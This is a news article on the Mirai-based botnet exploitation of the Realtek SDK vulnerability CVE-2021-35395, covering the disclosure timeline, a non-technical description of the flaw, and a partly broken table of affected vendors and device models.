Hundreds of thousands of Realtek-based devices under attack from IoT botnet
A dangerous vulnerability in Realtek chipsets used in hundreds of thousands of smart devices from at least 65 vendors is currently under attack from a notorious DDoS botnet gang.
The attacks started last week, according to a report from IoT security firm SAM, and began just three days after fellow security firm IoT Inspector published details about the vulnerability on its blog.
Vulnerability impacts little know but very popular Realtek SoC
Tracked as CVE-2021-35395, the vulnerability is part of four issues IoT Inspector researchers found in the software development kit (SDK) that ships with multiple Realtek chipsets (SoCs).
These chips are manufactured by Realtek but are shipped to other companies, which then use them as the basic System-on-Chip (SoC) board for their own devices, with the Realtek SDK serving as a configurator and starting point for their own firmware.
IoT Inspector said they found more than 200 different device models from at least 65 different vendors that had been built around these chips and were using the vulnerable SDK.
Estimated in the realm of hundreds of thousands of internet-connected devices, the list of vulnerable items includes routers, network gateways, Wi-Fi repeaters, IP cameras, smart lighting, and even internet-connected toys.
Of the four issues discovered by the IoT Inspector research team, the CVE-2021-35395 vulnerability received the highest severity rating, of 9.8 out of 10 on the CVSSv3 severity scale.
According to the research team, the vulnerability, which resided in a web panel used to configure the SDK/device, allowed a remote attacker to connect to these devices via malformed URL web panel parameters, bypass authentication, and run malicious code with the highest privileges, effectively taking over the device.
While Realtek released patches [PDF] before IoT Inspector published its findings last week, this was far too small of a time window for device vendors to deploy the security updates down the line to their own set of customers.
This means that today, the vast majority of these devices are still running outdated firmware (and an outdated Realtek SDK), being exposed to attacks.
A very busy botnet
Per SAM, exploitation started shortly after and came from the same Mirai-based botnet that a week before rushed to exploit a similar mega-bug in millions of routers running Arcadyan-based firmware.
The SAM research team said that based on their own scans, the most common device models currently running the vulnerable Realtek SDK include the likes of:
- Netis E1+ extender
- Edimax N150 and N300 Wi-Fi router
- Repotec RP-WR5444 router
Owners of such devices should look or inquire their sellers for new firmware patches. The full list of vulnerable devices is included below:
|A-Link Europe Ltd||A-Link WNAP WNAP(b)|
|ARRIS Group, Inc||VAP4402_CALA|
|Abocom System Inc.||Wireless Router ?|
|AIgital||Wifi Range Extenders|
|ASUSTek Computer Inc.||RT-Nxx models, WL330-NUL|
Wireless WPS Router RT-N10E
Wireless WPS Router RT-N10LX
Wireless WPS Router RT-N12E
Wireless WPS Router RT-N12LX
|BEST ONE TECHNOLOGY CO., LTD.||AP-BNC-800|
|Beeline||Smart Box v1|
AC1200DB Wireless Router F9K1113 v4
AC1200FE Wireless Router F9K1123
AC750 Wireless Router F9K1116
|China Mobile Communication Corp.||AN1202L|
|Compal Broadband Networks, INC.||CH66xx cable modems line.|
|D-Link||DIR-XXX models based on rlx-linux|
DAP-XXX models based on rlx-linux DIR-300
DAP-1360 B1 DSL-2640U
DSL_2640U VoIP Router DVG-2102S
VoIP Router DVG-5004S
VoIP Router DVG-N5402GF
VoIP Router DVG-N5402SP
VoIP Router DVG-N5412SP
Wireless VoIP Device DVG-N5402SP
|Davolink Inc.||DVW2700 1|
|Edge-core||VoIP Router ECG4510-05E-R01|
Wireless Router BR-6428nS
N150 Wireless Router BR6228GNS
N300 Wireless Router BR6428NS
|EnGenius Technologies, Inc.||11N Wireless Router|
Wireless AP Router
|Esson Technology Inc.||Wifi Module ESM8196 – https://fccid.io/RKOESM8196 (therefore any device using this wifi module)|
|EZ-NET Ubiquitous Corp.||NEXT-7004N|
|Hawking Technologies, Inc.||HAWNR3|
|I-O DATA DEVICE, INC.||WN-AC1167R|
|LG International||Axler Router LGI-R104N|
Axler Router LGI-R104T
Axler Router LGI-X501
Axler Router LGI-X502
Axler Router LGI-X503
Axler Router LGI-X601
Axler Router LGI-X602
Axler Router RT-DSE
|LINK-NET TECHNOLOGY CO., LTD.||LW-N664R2|
|Occtel||VoIP Router ODC201AC|
VoIP Router OGC200W
VoIP Router ONC200W
VoIP Router SP300-DS
VoIP Router SP5220SO
VoIP Router SP5220SP
|Omega Technology||Wireless N Router O31 OWLR151U|
Wireless N Router O70 OWLR307U
Axler Router R104
Axler Router R3
Axler Router X503
Axler Router X603
LotteMart Router 104L
LotteMart Router 502L
LotteMart Router 503L
|PLANEX COMMUNICATIONS INC.|
Planex Communications Corp.
|Sitecom Europe BV||Sitecom Wireless Gigabit Router WLR-4001|
Sitecom Wireless Router 150N X1 150N
Sitecom Wireless Router 300N X2 300N
Sitecom Wireless Router 300N X3 300N
|Sercomm Corp.||Telmex Infinitum|
|Shenzhen Yichen (JCG) Technology Development Co., Ltd.||JYR-N490|
|Skyworth Digital Technology.||Mesh Router|
|Tenda||AC6, AC10, W6, W9, i21|
TRENDnet Technology, Corp.
NBG-416N AP Router
NBG-418N AP Router
Catalin Cimpanu is a cybersecurity reporter for The Record. He previously worked at ZDNet and Bleeping Computer, where he became a well-known name in the industry for his constant scoops on new vulnerabilities, cyberattacks, and law enforcement actions against hackers.